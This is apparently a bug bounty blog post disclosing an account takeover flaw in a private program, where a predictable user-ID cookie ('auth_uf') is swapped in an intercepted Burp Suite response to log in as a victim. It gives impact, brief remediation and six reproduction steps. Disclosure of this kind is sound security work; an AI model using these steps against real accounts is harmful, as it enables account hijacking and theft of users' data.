Critical Account Takeover Vulnerability

Hello hackers, welcome to another blog on my latest vulnerability finding on a private bug bounty program.

 

Introduction:

Protecting user accounts and maintaining their privacy is critical in today's linked   digital world. Users can unfortunately be vulnerable to unauthorized access and account   takeover due to flaws in authentication methods. In this blog post, we will cover the vulnerability impact and mitigation, as well as the steps of reproduce.
 

Understanding The Vulnerability: 

As part of the authentication process, when we log into the application, the server sets a cookie.   And the cookie set by the server is predictable, because it is the user ID of the user who logged   into the application. So by manipulating the original users cookie to victim cookie or userId attacker can take over the victim's account. 
 

Impact:

The consequences of this vulnerability are severe. Once an attacker gains control over another user's account, they can access personal information, sensitive data, and even perform unauthorized actions on behalf of the compromised user. This could include making unauthorized purchases, altering account settings, posting malicious content, or carrying out identity theft. The implications are far-reaching, affecting both individuals and organizations that rely on the application.
 

Remediation:

Addressing this critical vulnerability requires a multi-faceted approach to enhance the security posture of the application. Here are some recommended remediation strategies: Implement Secure Session Management, Employ Secure Cookie Handling, Implement Multi-Factor Authentication (MFA), Implement secure or encrypted cookies.
 

Proof of Concept:

 Steps of reproduce: 

   1) Login into application with your original credentials.
   2) Capture this request in burp suite also capture response of this request. [Response as attached]
   3) Now logout from your account and go to login page.
   4) Now enter any random username and password and capture request in burp suite also capture the response of this request.
   5) Now paste your original response to this response just change the auth_uf value to victim userId value.
   6) Forward the request and you will able to login into victim's account.
 
 
      Image 1: Enter random username and passowrd.
      Image 2: Capture request in burp suite.


      Image 3: Response of random username and password.


      Image 4: Manipulate original response to victim by changing the auth_uf 


      Image 5: Successfully login into victim's account.
 
I hope you discover something new. Stay for more vulnerability blogs!!


Stay informed, stay vigilant, and stay secure!